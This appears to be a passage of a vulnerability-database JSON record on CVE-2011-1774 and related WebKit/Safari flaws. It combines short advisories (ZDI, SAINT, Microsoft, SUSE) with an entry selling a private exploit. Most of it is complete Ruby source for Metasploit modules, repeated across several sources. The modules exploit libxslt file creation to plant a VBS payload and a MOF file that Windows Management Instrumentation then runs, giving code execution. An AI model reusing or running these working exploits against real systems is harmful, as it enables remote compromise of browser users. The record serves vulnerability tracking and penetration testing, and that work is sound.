the application frees references from a particular element. When freeing these references, the application will fail to remove the reference from the rendering object. Later upon trying to free the element again, the application will access the freed reference which can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-242", "id": "ZDI-11-242", "title": "Apple Safari Rendering Object Body Detachment Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:47", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Webkit as utilized by either Apple Safari, or Google's Chrome browser. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within how the library handles implicitly defined styles. When processing a specific case for a style, the application will dispatch an event. During this dispatch, code can be executed that can be used to manipulate the DOM tree causing a type-switch. This type-switch can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-243", "id": "ZDI-11-243", "title": "WebKit ContentEditable Inline Style Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-01T03:05:17", "bulletinFamily": "exploit", "description": "Remote command execution exploit works on Windows XP/Vista/7 and MacOSX Snow Leopard.\n\nThis is private exploit. You can buy it at https://0day.today", "modified": "2014-09-17T00:00:00", "published": "2014-09-17T00:00:00", "id": "1337DAY-ID-22651", "href": "https://0day.today/exploit/description/22651", "type": "zdt", "title": "Safari SVGPathSegList Use-After-Free Exploit", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "saint": [{"lastseen": "2018-08-31T00:08:17", "bulletinFamily": "exploit", "description": "Added: 10/24/2011 \nCVE: [CVE-2011-1774](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774>) \nBID: [48840](<http://www.securityfocus.com/bid/48840>) \nOSVDB: [74017](<http://www.osvdb.org/74017>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nSafari versions prior to 5.0.6 use unsafe security settings when implementing libxslt. An attacker may leverage this weakness by creating a web page that references a malicious XSLT file. If loaded in a vulnerable Safari client, the attacker may be able to cause the browser to download, save and execute any file of their choice. \n\n### Resolution\n\nUpgrade to Apple Safari 5.0.6 or later. \n\n### References\n\n<http://support.apple.com/kb/HT4808> \n\n\n### Limitations\n\nThis exploit has been tested against Apple Safari 5.0.5 on Windows XP SP3 English (DEP OptIn). \nThe payload will not be executed until the next successful login. \nThe target must be able to connect to an HTTP server running on the SAINT Exploit host. This service listens on port 8000 by default. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-10-24T00:00:00", "published": "2011-10-24T00:00:00", "id": "SAINT:93F870242C8D8DFE6FB0218061E2532F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_libxslt_file_create", "title": "Apple Safari libxslt File Create", "type": "saint", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:07", "bulletinFamily": "exploit", "description": "Added: 10/24/2011 \nCVE: [CVE-2011-1774](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774>) \nBID: [48840](<http://www.securityfocus.com/bid/48840>) \nOSVDB: [74017](<http://www.osvdb.org/74017>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nSafari versions prior to 5.0.6 use unsafe security settings when implementing libxslt. An attacker may leverage this weakness by creating a web page that references a malicious XSLT file. If loaded in a vulnerable Safari client, the attacker may be able to cause the browser to download, save and execute any file of their choice. \n\n### Resolution\n\nUpgrade to Apple Safari 5.0.6 or later. \n\n### References\n\n<http://support.apple.com/kb/HT4808> \n\n\n### Limitations\n\nThis exploit has been tested against Apple Safari 5.0.5 on Windows XP SP3 English (DEP OptIn). \nThe payload will not be executed until the next successful login. \nThe target must be able to connect to an HTTP server running on the SAINT Exploit host. This service listens on port 8000 by default. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-10-24T00:00:00", "published": "2011-10-24T00:00:00", "id": "SAINT:E8E10FFE061EB44A3ED40AD04B13EC24", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_libxslt_file_create", "type": "saint", "title": "Apple Safari libxslt File Create", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "description": "Added: 10/24/2011 \nCVE: [CVE-2011-1774](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774>) \nBID: [48840](<http://www.securityfocus.com/bid/48840>) \nOSVDB: [74017](<http://www.osvdb.org/74017>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nSafari versions prior to 5.0.6 use unsafe security settings when implementing libxslt. An attacker may leverage this weakness by creating a web page that references a malicious XSLT file. If loaded in a vulnerable Safari client, the attacker may be able to cause the browser to download, save and execute any file of their choice. \n\n### Resolution\n\nUpgrade to Apple Safari 5.0.6 or later. \n\n### References\n\n<http://support.apple.com/kb/HT4808> \n\n\n### Limitations\n\nThis exploit has been tested against Apple Safari 5.0.5 on Windows XP SP3 English (DEP OptIn). \nThe payload will not be executed until the next successful login. \nThe target must be able to connect to an HTTP server running on the SAINT Exploit host. This service listens on port 8000 by default. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-10-24T00:00:00", "published": "2011-10-24T00:00:00", "id": "SAINT:92788531D3EC95DEA25C0A30FCD1E592", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_libxslt_file_create", "type": "saint", "title": "Apple Safari libxslt File Create", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-04-29T16:55:23", "bulletinFamily": "exploit", "description": "This module exploits a XSLT vulnerability in Webkit to drop ASCII or UTF-8 files to the target file-system. By default, the file will be dropped in C:\\Program Files\\", "modified": "2018-07-12T22:34:52", "published": "2011-10-18T16:30:28", "id": "MSF:AUXILIARY/SERVER/WEBKIT_XSLT_DROPPER", "href": "", "type": "metasploit", "title": "Cross Platform Webkit File Dropper", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cross Platform Webkit File Dropper',\n 'Description' => %q{\n This module exploits a XSLT vulnerability in Webkit to drop ASCII or UTF-8\n files to the target file-system. By default, the file will be dropped in\n C:\\Program Files\\\n },\n 'Author' => [ 'Nicolas Gregoire' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-1774' ]\n ],\n 'Actions' =>\n [\n [ 'WebServer' ]\n ],\n 'PassiveActions' =>\n [\n 'WebServer'\n ],\n 'DefaultAction' => 'WebServer'))\n\n register_options(\n [\n OptString.new('REMOTE_PATH', [ true, \"Location of the remote file\", 'flag.txt' ]),\n OptString.new('REMOTE_CONTENT', [ true, \"Content of the remote file\", 'Hello from CVE-2011-1774' ])\n ])\n end\n\n def on_request_uri(cli, request)\n path = datastore['REMOTE_PATH']\n content = datastore['REMOTE_CONTENT']\n html = <<-EOS\n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?>\n<!-- Define the DTD of the document\n This is needed, in order to later reference the XSLT stylesheet by a #fragment\n This trick allows to have both the XML and the XSL in the same file\n Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->\n<!DOCTYPE doc [\n <!ATTLIST xsl:stylesheet\n id ID #REQUIRED\n>]>\n<doc>\n\n<!-- Define location and content of the file -->\n<path><![CDATA[#{path}]]></path>\n<content><![CDATA[#{content}]]></content>\n\n<!-- The XSLT stylesheet header, including the \"sx\" extension -->\n<xsl:stylesheet id=\"fragment\" version=\"1.0\"\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n xmlns:sx=\"http://icl.com/saxon\"\n extension-element-prefixes=\"sx\"\n xmlns=\"http://www.w3.org/1999/xhtml\" >\n<xsl:output method=\"xml\" indent=\"yes\" />\n\n<!-- The XSLT template -->\n<xsl:template match=\"/\">\n <!-- Create the file -->\n <xsl:variable name=\"path\" select=\"//path/text()\"/>\n <sx:output file=\"{$path}\" method=\"text\">\n <xsl:value-of select=\"//content\"/>\n </sx:output>\n <!-- Send some output to the browser -->\n <html> </html>\n</xsl:template>\n</xsl:stylesheet>\n</doc>\nEOS\n\n print_status(\"Sending XSLT payload ...\")\n print_status(\"Destination file : #{path}\")\n send_response_html(cli, html, { 'Content-Type' => 'application/xml' })\n end\n\n def run\n exploit()\n end\nend\n", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/webkit_xslt_dropper.rb"}, {"lastseen": "2019-04-13T08:00:42", "bulletinFamily": "exploit", "description": "This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS.", "modified": "2017-09-14T02:03:34", "published": "2011-10-18T07:39:50", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/SAFARI_XSLT_OUTPUT", "href": "", "type": "metasploit", "title": "Apple Safari Webkit libxslt Arbitrary File Creation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation',\n 'Description' => %q{\n This module exploits a file creation vulnerability in the Webkit\n rendering engine. It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Nicolas Gregoire'],\n 'References' =>\n [\n ['CVE', '2011-1774'],\n ['OSVDB', '74017'],\n ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],\n ],\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #Windows before Vista\n [ 'Automatic', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 20 2011'))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Check target before attacking\n agent = request.headers['User-Agent']\n if agent !~ /Windows NT 5\\.1/ or agent !~ /Safari\\/5/ or agent =~ /Chrome/\n print_error(\"This target isn't supported: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n url = \"http://\"\n url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n url += \":\" + datastore['SRVPORT'].to_s + get_resource() + \"/\"\n\n content = <<-EOS\n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?>\n<!-- Define the DTD of the document\n This is needed, in order to later reference the XSLT stylesheet by a #fragment\n This trick allows to have both the XML and the XSL in the same file\n Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->\n<!DOCTYPE doc [\n <!ATTLIST xsl:stylesheet\n id ID #REQUIRED\n>]>\n<doc>\n\n<!-- Define location and content of the files -->\n<mof>\n <location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\wbem\\\\mof\\\\#{@mof_name}]]></location>\n <content><![CDATA[#{@mof_content}]]></content>\n</mof><vbs>\n <location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\#{@vbs_name}]]></location>\n <content><![CDATA[#{@vbs_content}]]></content>\n</vbs>\n\n<!-- The XSLT stylesheet header, including the \"sx\" extension -->\n<xsl:stylesheet id=\"fragment\" version=\"1.0\"\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n xmlns:sx=\"http://icl.com/saxon\"\n extension-element-prefixes=\"sx\"\n xmlns=\"http://www.w3.org/1999/xhtml\" >\n<xsl:output method=\"xml\" indent=\"yes\" />\n\n<!-- The XSLT template -->\n<xsl:template match=\"/\">\n <!-- Define some XSLT variables -->\n <xsl:variable name=\"moflocation\" select=\"//mof/location/text()\"/>\n <xsl:variable name=\"vbslocation\" select=\"//vbs/location/text()\"/>\n <!-- Create the files -->\n <sx:output file=\"{$vbslocation}\" method=\"text\">\n <xsl:value-of select=\"//vbs/content\"/>\n </sx:output>\n <sx:output file=\"{$moflocation}\" method=\"text\">\n <xsl:value-of select=\"//mof/content\"/>\n </sx:output>\n <!-- Some output to the browser -->\n <html> </html>\n</xsl:template>\n</xsl:stylesheet>\n</doc>\n EOS\n\n #Clear the extra tabs\n content = content.gsub(/^ {4}/, '')\n\n print_status(\"Sending #{self.name}\")\n send_response(cli, content, {'Content-Type'=>'application/xml'})\n handler(cli)\n\n end\n\n def exploit\n # In order to save binary data to the file system the payload is written to a VBS\n # file and execute it from there via a MOF\n @mof_name = rand_text_alpha(rand(5)+5) + \".mof\"\n @vbs_name = rand_text_alpha(rand(5)+5) + \".vbs\"\n\n print_status(\"Encoding payload into vbs...\")\n payload = generate_payload_exe\n @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)\n\n print_status(\"Generating mof file...\")\n @mof_content = generate_mof(@mof_name, @vbs_name)\n super\n end\nend\n", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/safari_xslt_output.rb"}], "msvr": [{"lastseen": "2016-09-04T11:12:56", "bulletinFamily": "software", "description": "#### Executive Summary\n\nMicrosoft is providing notification of the discovery and remediation of a vulnerability affecting Apple Safari version 5.05 and earlier. Microsoft discovered and disclosed the vulnerability under coordinated vulnerability disclosure to the affected vendor, Apple Inc. Apple Inc. has remediated the vulnerability in Safari.\n\nA vulnerability exists in the way Safari handles certain content types. An attacker could exploit this vulnerability to cause Safari to execute script content and disclose potentially sensitive information. An attacker who successfully exploited this vulnerability would gain sensitive information that could be used in further attacks.\n\nMicrosoft Vulnerability Research reported this issue to and coordinated with Apple to ensure remediation of this issue. The vulnerability has been assigned the entry, CVE-2010-1420, in the Common Vulnerabilities and Exposures list. For more information, including information about updates from Apple, see [Apple Safari Security Alerts](<http://support.apple.com/kb/ht4808>).\n\n#### Mitigating Factors\n\n * In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\n * The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful, an attacker must convince a user to click a link in an e-mail message that takes users to the attacker's Web site.\n", "modified": "2011-08-16T00:00:00", "published": "2011-08-16T00:00:00", "id": "MSVR11-009", "href": "https://technet.microsoft.com/en-us/library/security/msvr11-009", "title": "Vulnerability in Apple Safari Could Allow Information Disclosure", "type": "msvr", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "suse": [{"lastseen": "2016-09-04T11:55:38", "bulletinFamily": "unix", "description": "This update of libwebkit fixes:\n\n * CVE-2011-1774: XSLT file creation allowed webpages\n evaluating XSLT code to create files.\n * ZDI-11-139 Webkit Anonymous Frame remote code exec\n", "modified": "2011-08-02T01:08:15", "published": "2011-08-02T01:08:15", "id": "SUSE-SU-2011:0857-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00000.html", "title": "Security update for libwebkit (important)", "type": "suse", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:22", "bulletinFamily": "exploit", "description": "", "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "href": "https://packetstormsecurity.com/files/105943/Apple-Safari-Webkit-libxslt-Arbitrary-File-Creation.html", "id": "PACKETSTORM:105943", "type": "packetstorm", "title": "Apple Safari Webkit libxslt Arbitrary File Creation", "sourceData": "`## \n# $Id: safari_xslt_output.rb 13987 2011-10-18 07:39:50Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::WbemExec \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation', \n'Description' => %q{ \nThis module exploits a file creation vulnerability in the Webkit \nrendering engine. It is possible to redirect the output of a XSLT \ntransformation to an arbitrary file. The content of the created file must be \nASCII or UTF-8. The destination path can be relative or absolute. This module \nhas been tested on Safari and Maxthon. Code execution can be acheived by first \nuploading the payload to the remote machine in VBS format, and then upload a MOF \nfile, which enables Windows Management Instrumentation service to execute the VBS. \n}, \n'License' => MSF_LICENSE, \n'Author' => ['Nicolas Gregoire'], \n'Version' => '$Revision: 13987 $', \n'References' => \n[ \n['CVE', '2011-1774'], \n['OSVDB', '74017'], \n['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'], \n], \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n#Windows before Vista \n[ 'Automatic', { } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jul 20 2011')) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Check target before attacking \nagent = request.headers['User-Agent'] \nif agent !~ /Windows NT 5\\.1/ or agent !~ /Safari/ or agent !~ /Version\\/5\\.0\\.\\d/ \nprint_error(\"This target isn't supported: #{agent.to_s}\") \nsend_not_found(cli) \nreturn \nend \n \nurl = \"http://\" \nurl += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nurl += \":\" + datastore['SRVPORT'] + get_resource() + \"/\" \n \ncontent = <<-EOS \n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?> \n<!-- Define the DTD of the document \nThis is needed, in order to later reference the XSLT stylesheet by a #fragment \nThis trick allows to have both the XML and the XSL in the same file \nCf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html --> \n<!DOCTYPE doc [ \n<!ATTLIST xsl:stylesheet \nid ID #REQUIRED \n>]> \n<doc> \n \n<!-- Define location and content of the files --> \n<mof> \n<location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\wbem\\\\mof\\\\#{@mof_name}]]></location> \n<content><![CDATA[#{@mof_content}]]></content> \n</mof><vbs> \n<location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\#{@vbs_name}]]></location> \n<content><![CDATA[#{@vbs_content}]]></content> \n</vbs> \n \n<!-- The XSLT stylesheet header, including the \"sx\" extension --> \n<xsl:stylesheet id=\"fragment\" version=\"1.0\" \nxmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" \nxmlns:sx=\"http://icl.com/saxon\" \nextension-element-prefixes=\"sx\" \nxmlns=\"http://www.w3.org/1999/xhtml\" > \n<xsl:output method=\"xml\" indent=\"yes\" /> \n \n<!-- The XSLT template --> \n<xsl:template match=\"/\"> \n<!-- Define some XSLT variables --> \n<xsl:variable name=\"moflocation\" select=\"//mof/location/text()\"/> \n<xsl:variable name=\"vbslocation\" select=\"//vbs/location/text()\"/> \n<!-- Create the files --> \n<sx:output file=\"{$vbslocation}\" method=\"text\"> \n<xsl:value-of select=\"//vbs/content\"/> \n</sx:output> \n<sx:output file=\"{$moflocation}\" method=\"text\"> \n<xsl:value-of select=\"//mof/content\"/> \n</sx:output> \n<!-- Some output to the browser --> \n<html> </html> \n</xsl:template> \n</xsl:stylesheet> \n</doc> \nEOS \n \n#Clear the extra tabs \ncontent = content.gsub(/^\\t\\t/, '') \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \nsend_response(cli, content, {'Content-Type'=>'application/xml'}) \nhandler(cli) \n \nend \n \ndef exploit \n# In order to save binary data to the file system the payload is written to a VBS \n# file and execute it from there via a MOF \n@mof_name = rand_text_alpha(rand(5)+5) + \".mof\" \n@vbs_name = rand_text_alpha(rand(5)+5) + \".vbs\" \n \nprint_status(\"Encoding payload into vbs...\") \npayload = generate_payload_exe \n@vbs_content = Msf::Util::EXE.to_exe_vbs(payload) \n \nprint_status(\"Generating mof file...\") \n@mof_content = generate_mof(@mof_name, @vbs_name) \nsuper \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/105943/safari_xslt_output.rb.txt", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T08:58:10", "bulletinFamily": "exploit", "description": "Apple Safari Webkit libxslt Arbitrary File Creation. CVE-2011-1425,CVE-2011-1774. Remote exploit for windows platform", "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "id": "EDB-ID:17993", "href": "https://www.exploit-db.com/exploits/17993/", "type": "exploitdb", "title": "Apple Safari Webkit libxslt Arbitrary File Creation", "sourceData": "##\r\n# $Id: safari_xslt_output.rb 13987 2011-10-18 07:39:50Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\tinclude Msf::Exploit::WbemExec\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a file creation vulnerability in the Webkit\r\n\t\t\t\trendering engine. It is possible to redirect the output of a XSLT\r\n\t\t\t\ttransformation to an arbitrary file. The content of the created file must be\r\n\t\t\t\tASCII or UTF-8. The destination path can be relative or absolute. This module\r\n\t\t\t\thas been tested on Safari and Maxthon. Code execution can be acheived by first\r\n\t\t\t\tuploading the payload to the remote machine in VBS format, and then upload a MOF\r\n\t\t\t\tfile, which enables Windows Management Instrumentation service to execute the VBS.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['Nicolas Gregoire'],\r\n\t\t\t'Version' => '$Revision: 13987 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-1774'],\r\n\t\t\t\t\t['OSVDB', '74017'],\r\n\t\t\t\t\t['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#Windows before Vista\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jul 20 2011'))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Check target before attacking\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tif agent !~ /Windows NT 5\\.1/ or agent !~ /Safari/ or agent !~ /Version\\/5\\.0\\.\\d/\r\n\t\t\tprint_error(\"This target isn't supported: #{agent.to_s}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\turl = \"http://\"\r\n\t\turl += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\turl += \":\" + datastore['SRVPORT'] + get_resource() + \"/\"\r\n\r\n\t\tcontent = <<-EOS\r\n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?>\r\n<!-- Define the DTD of the document\r\n\t This is needed, in order to later reference the XSLT stylesheet by a #fragment\r\n\t This trick allows to have both the XML and the XSL in the same file\r\n\t Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->\r\n<!DOCTYPE doc [\r\n <!ATTLIST xsl:stylesheet\r\n id ID #REQUIRED\r\n>]>\r\n<doc>\r\n\r\n<!-- Define location and content of the files -->\r\n<mof>\r\n\t<location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\wbem\\\\mof\\\\#{@mof_name}]]></location>\r\n\t<content><![CDATA[#{@mof_content}]]></content>\r\n</mof><vbs>\r\n\t<location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\#{@vbs_name}]]></location>\r\n\t<content><![CDATA[#{@vbs_content}]]></content>\r\n</vbs>\r\n\r\n<!-- The XSLT stylesheet header, including the \"sx\" extension -->\r\n<xsl:stylesheet id=\"fragment\" version=\"1.0\" \r\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\r\n xmlns:sx=\"http://icl.com/saxon\"\r\n extension-element-prefixes=\"sx\"\r\n xmlns=\"http://www.w3.org/1999/xhtml\" >\r\n<xsl:output method=\"xml\" indent=\"yes\" />\r\n\r\n<!-- The XSLT template -->\r\n<xsl:template match=\"/\">\r\n\t<!-- Define some XSLT variables -->\r\n\t<xsl:variable name=\"moflocation\" select=\"//mof/location/text()\"/>\r\n\t<xsl:variable name=\"vbslocation\" select=\"//vbs/location/text()\"/>\r\n\t<!-- Create the files -->\r\n\t<sx:output file=\"{$vbslocation}\" method=\"text\">\r\n\t\t<xsl:value-of select=\"//vbs/content\"/>\r\n\t</sx:output>\r\n\t<sx:output file=\"{$moflocation}\" method=\"text\">\r\n\t\t<xsl:value-of select=\"//mof/content\"/>\r\n\t</sx:output>\r\n\t<!-- Some output to the browser -->\r\n\t<html> </html>\r\n</xsl:template>\r\n</xsl:stylesheet>\r\n</doc>\r\n\t\tEOS\r\n\r\n\t\t#Clear the extra tabs\r\n\t\tcontent = content.gsub(/^\\t\\t/, '')\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tsend_response(cli, content, {'Content-Type'=>'application/xml'})\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# In order to save binary data to the file system the payload is written to a VBS\r\n\t\t# file and execute it from there via a MOF\r\n\t\t@mof_name = rand_text_alpha(rand(5)+5) + \".mof\"\r\n\t\t@vbs_name = rand_text_alpha(rand(5)+5) + \".vbs\"\r\n\r\n\t\tprint_status(\"Encoding payload into vbs...\")\r\n\t\tpayload = generate_payload_exe\r\n\t\t@vbs_content = Msf::Util::EXE.to_exe_vbs(payload)\r\n\r\n\t\tprint_status(\"Generating mof 